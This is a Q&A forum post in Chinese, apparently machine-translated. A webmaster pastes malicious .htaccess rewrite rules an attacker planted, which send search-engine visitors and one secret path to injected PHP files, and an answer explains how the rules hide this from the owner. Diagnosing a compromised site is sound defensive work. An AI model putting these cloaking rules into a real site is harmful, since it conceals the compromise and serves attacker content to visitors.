我的网站最近遭到恶意软件感染攻击。在添加的少数php文件中,我的.htaccess也被修改了。通常它只是说index options但是攻击者改变了它说:
RewriteEngine on
RewriteRule ^6334437290/(.*)$ dita-cymbal.php [QSA,L]
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ capacitance-angelika.php?$1 [L]
我对.htaccess知之甚少。有谁知道这些重写规则有什么作用? dita-cymbal.php和capacitance-angelika.php是攻击者添加的php文件之一。
希望这可以帮助任何未来的网站管理员遭受同样的恶意软件攻击,当我搜索这些时,我没有得到任何结果。
答案 0 :(得分:1)
它说......
重写' 6334437290 /'中的任何请求到dita-symbal.php。如果匹配,请不要进一步处理。
重写任何不存在的内容,并且来自具有搜索引擎名称的用户代理,或者其中包含搜索引擎名称的引荐来源,capacitance-angelika.php。据推测,网站所有者不太可能看到这些,因为他们不会通过搜索引擎访问,在检测之前给予更多时间。